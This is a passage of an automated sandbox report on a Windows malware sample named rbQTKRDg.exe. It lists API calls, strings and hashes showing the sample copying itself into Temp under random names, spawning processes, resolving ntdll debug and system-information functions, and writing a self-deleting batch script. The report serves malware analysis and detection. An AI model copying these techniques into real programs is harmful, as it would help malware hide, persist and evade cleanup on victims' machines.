                              • memset.MSVCRT ref: 008F2774
                              • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 008F2787
                              • wsprintfA.USER32 ref: 008F27AB
                                • Part of subcall function 008F185B: GetSystemTimeAsFileTime.KERNEL32(008F1F92,00000000,?,00000000,?,?,?,008F1F92,?,00000000,00000002), ref: 008F1867
                                • Part of subcall function 008F185B: srand.MSVCRT ref: 008F1878
                                • Part of subcall function 008F185B: rand.MSVCRT ref: 008F1880
                                • Part of subcall function 008F185B: srand.MSVCRT ref: 008F1890
                                • Part of subcall function 008F185B: rand.MSVCRT ref: 008F1894
                              • wsprintfA.USER32 ref: 008F27C6
                              • CopyFileA.KERNEL32(?,008F4C80,00000000), ref: 008F27D4
                              • wsprintfA.USER32 ref: 008F27F4
                                • Part of subcall function 008F1973: PathFileExistsA.SHLWAPI(008F4E5C,00000000,C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe), ref: 008F1992
                                • Part of subcall function 008F1973: CreateFileA.KERNEL32(008F4E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 008F19BA
                                • Part of subcall function 008F1973: Sleep.KERNEL32(00000064), ref: 008F19C6
                                • Part of subcall function 008F1973: wsprintfA.USER32 ref: 008F19EC
                                • Part of subcall function 008F1973: CopyFileA.KERNEL32(008F4E5C,?,00000000), ref: 008F1A00
                                • Part of subcall function 008F1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008F1A1E
                                • Part of subcall function 008F1973: GetFileSize.KERNEL32(008F4E5C,00000000), ref: 008F1A2C
                                • Part of subcall function 008F1973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 008F1A46
                                • Part of subcall function 008F1973: ReadFile.KERNEL32(008F4E5C,008F4E60,00000000,?,00000000), ref: 008F1A65
                              • DeleteFileA.KERNEL32(?,?,008F4E54,008F4E58), ref: 008F281A
                              • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,008F4E54,008F4E58), ref: 008F2832
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true
                              • Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd
                              Similarity
                              • API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
                              • String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
                              • API String ID: 692489704-3099098879
                              • Opcode ID: 8f27e467723549cc090383bd04d471ad0c77d519b3847ed1d5f89ba94c81f12f
                              • Instruction ID: fcbd5d6010cc623b6a18480393145a3feb6633926ce973a333f7bf7597029336
                              • Opcode Fuzzy Hash: 8f27e467723549cc090383bd04d471ad0c77d519b3847ed1d5f89ba94c81f12f
                              • Instruction Fuzzy Hash: F0215BB694021C7BEB10E7B89C89EFB776CFB04755F4005A2B764E2142E674DF848AA0
                              APIs
                                • Part of subcall function 008F185B: GetSystemTimeAsFileTime.KERNEL32(008F1F92,00000000,?,00000000,?,?,?,008F1F92,?,00000000,00000002), ref: 008F1867
                                • Part of subcall function 008F185B: srand.MSVCRT ref: 008F1878
                                • Part of subcall function 008F185B: rand.MSVCRT ref: 008F1880
                                • Part of subcall function 008F185B: srand.MSVCRT ref: 008F1890
                                • Part of subcall function 008F185B: rand.MSVCRT ref: 008F1894
                              • wsprintfA.USER32 ref: 008F15AA
                              • wsprintfA.USER32 ref: 008F15C6
                              • lstrlen.KERNEL32(?), ref: 008F15D2
                              • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 008F15EE
                              • WriteFile.KERNEL32(00000000,?,00000000,00000001,00000000), ref: 008F1609
                              • CloseHandle.KERNEL32(00000000), ref: 008F1612
                              • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 008F162D
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true
                              • Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd
                              Similarity
                              • API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
                              • String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe$open
                              • API String ID: 617340118-938945071
                              • Opcode ID: 895a9e1c707b858c493b28f704d20f09c3a7da2759adc81383640fdebe2c7da4
                              • Instruction ID: 2e955a70e2925535297584e9548d52bcae662a5c773545c22a6dbcb45424ec1f
                              • Opcode Fuzzy Hash: 895a9e1c707b858c493b28f704d20f09c3a7da2759adc81383640fdebe2c7da4
                              • Instruction Fuzzy Hash: A7111F76A0112CBADB2097B59C89DFB7A6CFF59761F000052F659E2140EA649B84CAB0
                              APIs
                              • GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,008F1400), ref: 008F1226
                              • GetProcAddress.KERNEL32(00000000), ref: 008F122D
                              • GetCurrentProcessId.KERNEL32(?,?,?,?,008F1400), ref: 008F123F
                              • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,008F1400), ref: 008F1250
                              • VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe,?,?,?,?,008F1400), ref: 008F129E
                              • VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe,?,?,?,?,008F1400), ref: 008F12B0
                              • CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe,?,?,?,?,008F1400), ref: 008F12F5
                              • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,008F1400), ref: 008F130A
                              Strings
                              • ntdll.dll, xrefs: 008F1219
                              • C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe, xrefs: 008F1262
                              • ZwQuerySystemInformation, xrefs: 008F1212
                              Memory Dump Source
                              • Source File: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true
                              • Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd
                              Similarity
                              • API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
                              • String ID: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe$ZwQuerySystemInformation$ntdll.dll
                              • API String ID: 1500695312-3201997827
                              • Opcode ID: caed562a8b6e70c76fd501713b3c2d5ad8f6bacfe6cd0ee6709e4ae0f7ef50b1
                              • Instruction ID: 295d01f8b18274be4746d5c21442619bb2bc42073295396d65f89ff6a6b668f9
                              • Opcode Fuzzy Hash: caed562a8b6e70c76fd501713b3c2d5ad8f6bacfe6cd0ee6709e4ae0f7ef50b1
                              • Instruction Fuzzy Hash: DD21BD31705719EBDB20DBB58C08F7BBAA8FB85B10F000919F645E6280DB749A44C7A5
                              APIs
                              • CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,7622E800,?,?,008F29DB,?,00000001), ref: 008F26A7
                              • WaitForSingleObject.KERNEL32(00000000,000000FF,7622E800,?,?,008F29DB,?,00000001), ref: 008F26B5
                              • lstrlen.KERNEL32(?), ref: 008F26C4
                              • ??2@YAPAXI@Z.MSVCRT(-00000005), ref: 008F26CE
                              • lstrcpy.KERNEL32(00000004,?), ref: 008F26E3
                              • lstrcpy.KERNEL32(?,00000004), ref: 008F271F
                              • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 008F272D
                              • SetEvent.KERNEL32 ref: 008F273C
                              Memory Dump Source
                              • Source File: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true
                              • Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd
                              Similarity
                              • API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
                              • String ID:
                              • API String ID: 41106472-0
                              • Opcode ID: cf3e7d2ef39be0a49805f0fdb53ef43f74c3657cf2bfc334275863fc443ed806
                              • Instruction ID: 527ba7a7710d7b437272f363660a44183d6f315b7b6d20e2a453fbeda90e89b8
                              • Opcode Fuzzy Hash: cf3e7d2ef39be0a49805f0fdb53ef43f74c3657cf2bfc334275863fc443ed806
                              • Instruction Fuzzy Hash: DF116A7A500618EFCB21AF39EC48C7B7BA9FB94721714802BFA58C7220DB709D95DB50
                              APIs
                              • srand.MSVCRT ref: 008F1BCD
                              • rand.MSVCRT ref: 008F1BD8
                              • memset.MSVCRT ref: 008F1C43
                              • memcpy.MSVCRT(?,YWKmOnYauQpPZufrAsIqfTxyGEQGVTHpqJbBPtXzeeJrVqYKwFLcApoCPhIwSdSmbNlKkUolSxvtQOMLsecyRGgsavxDVfRHUroHEdiRjXLjkCbcBZmWNhzDWanZdggNtMXhUOCDBwvljiyTzAJIMEkFinFu,00000006,?,00000000,00000040,?,00000000,00000000,?,00000000,00000002), ref: 008F1C4F
                              • lstrcat.KERNEL32(?,.exe), ref: 008F1C5D
                              Strings
                              • .exe, xrefs: 008F1C57
                              • YWKmOnYauQpPZufrAsIqfTxyGEQGVTHpqJbBPtXzeeJrVqYKwFLcApoCPhIwSdSmbNlKkUolSxvtQOMLsecyRGgsavxDVfRHUroHEdiRjXLjkCbcBZmWNhzDWanZdggNtMXhUOCDBwvljiyTzAJIMEkFinFu, xrefs: 008F1B8A, 008F1B9C, 008F1C15, 008F1C49
                              Memory Dump Source
                              • Source File: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true
                              • Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd
                              Similarity
                              • API ID: lstrcatmemcpymemsetrandsrand
                              • String ID: .exe$YWKmOnYauQpPZufrAsIqfTxyGEQGVTHpqJbBPtXzeeJrVqYKwFLcApoCPhIwSdSmbNlKkUolSxvtQOMLsecyRGgsavxDVfRHUroHEdiRjXLjkCbcBZmWNhzDWanZdggNtMXhUOCDBwvljiyTzAJIMEkFinFu
                              • API String ID: 122620767-3324622049
                              • Opcode ID: f44a030acd001e749f7898236ac8b9027c5dbe2b935cf1424361267bb4de5c49
                              • Instruction ID: fe88a39ce9507d4c5dc3f1d4e500a1ae414af22b238563ce95d058496bb0e1ba
                              • Opcode Fuzzy Hash: f44a030acd001e749f7898236ac8b9027c5dbe2b935cf1424361267bb4de5c49
                              • Instruction Fuzzy Hash: 57214932E44294EED72523396C48F7A3B44FFE3721F1610ABFA959B1A3D5A40985C261
                              APIs
                              • memset.MSVCRT ref: 008F18B1
                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,76230F00,76938400), ref: 008F18D3
                              • CloseHandle.KERNEL32(008F2549), ref: 008F18E9
                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 008F18F0
                              • GetExitCodeProcess.KERNEL32(?,008F2549), ref: 008F1901
                              • CloseHandle.KERNEL32(?), ref: 008F190A
                              Memory Dump Source
                              • Source File: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true
                              • Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd
                              Similarity
                              • API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
                              • String ID:
                              • API String ID: 876959470-0
                              • Opcode ID: 1e5e5b5dc5c0bd15a92c151fcc556a018c439a29a7e8be0aebaff3e547ac6d4b
                              • Instruction ID: 2b28ca2aaeb883b653bf6d42e676479a722e43360227940355f9358476ee64ab
                              • Opcode Fuzzy Hash: 1e5e5b5dc5c0bd15a92c151fcc556a018c439a29a7e8be0aebaff3e547ac6d4b
                              • Instruction Fuzzy Hash: C401217690112CBBCF216BA5DC48DEF7F7DFF85760F104122FA15E51A0D6714A58CAA0
                              APIs
                              • GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 008F1334
                              • GetProcAddress.KERNEL32(00000000), ref: 008F133B
                              • memset.MSVCRT ref: 008F1359
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true
                              • Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd
                              Similarity
                              • API ID: AddressHandleModuleProcmemset
                              • String ID: NtSystemDebugControl$ntdll.dll
                              • API String ID: 3137504439-2438149413
                              • Opcode ID: a13050709c849bc3e68d4737a6f37f4f4ae3805372661825900bf50187ee01a4
                              • Instruction ID: 43ea52c697a75ea76e61516c5e26ed6f1eb9b6c3e5f08a9b0208017f62630f47
                              • Opcode Fuzzy Hash: a13050709c849bc3e68d4737a6f37f4f4ae3805372661825900bf50187ee01a4
                              • Instruction Fuzzy Hash: 4D01397160020DEFDF109FB8AC89D7FBBA8FB51314F00412AFA11E2250E3B49655CA51
                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true
                              • Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd
                              Similarity
                              • API ID: strrchr$lstrcmpilstrcpylstrlen
                              • String ID:
                              • API String ID: 3636361484-0
                              • Opcode ID: 78159c9f9bb87cc2381c7c898271faba5dc7f9ae015662c57248f3ca8db49f0d
                              • Instruction ID: 240b858026278dc28ebf8f4e511286c74e9be3dfc6ac2c1be5b4b4d2c4bdf800
                              • Opcode Fuzzy Hash: 78159c9f9bb87cc2381c7c898271faba5dc7f9ae015662c57248f3ca8db49f0d
                              • Instruction Fuzzy Hash: EF01A2B291421DAFEF205770EC48FB6779CFB04310F140066EB45E2090EA74AA84CBA4
                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(008F1F92,00000000,?,00000000,?,?,?,008F1F92,?,00000000,00000002), ref: 008F1867
                              • srand.MSVCRT ref: 008F1878
                              • rand.MSVCRT ref: 008F1880
                              • srand.MSVCRT ref: 008F1890
                              • rand.MSVCRT ref: 008F1894
                              Memory Dump Source
                              • Source File: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true
                              • Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd
                              Similarity
                              • API ID: Timerandsrand$FileSystem
                              • String ID:
                              • API String ID: 4106363736-0
                              • Opcode ID: bd8f6948e1f7559d14051fed8606093db1fa02d0b29f697a6f15b6316c9487ee
                              • Instruction ID: 59bdb30659c5f55e6022f168d07d588e33a57dc06f8296bde8793e23026534fc
                              • Opcode Fuzzy Hash: bd8f6948e1f7559d14051fed8606093db1fa02d0b29f697a6f15b6316c9487ee
                              • Instruction Fuzzy Hash: 9DE01A77A10618BBDB00A7B9EC46DAEBBACEE84161B110577F600E3254E974E944CAB4
                              APIs
                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 008F603C
                              • GetProcAddress.KERNEL32(00000000,008F6064), ref: 008F604F
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true
                              • Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd
                              Similarity
                              • API ID: AddressHandleModuleProc
                              • String ID: kernel32.dll
                              • API String ID: 1646373207-1793498882
                              • Opcode ID: 6750f1bf0ad726f25820d4d3abd3a5fccebd0bd4d279ee86c22cd545667e8a6a
                              • Instruction ID: 5bbbdb91308d950e35d193dd817e10e020600895e8e2b2b4a4c89a72f5afa355
                              • Opcode Fuzzy Hash: 6750f1bf0ad726f25820d4d3abd3a5fccebd0bd4d279ee86c22cd545667e8a6a
                              • Instruction Fuzzy Hash: 7BF0C2B114028D9BDF708E74CC44BEE37E4EB55700F50062AEA09CB241DB3486558B28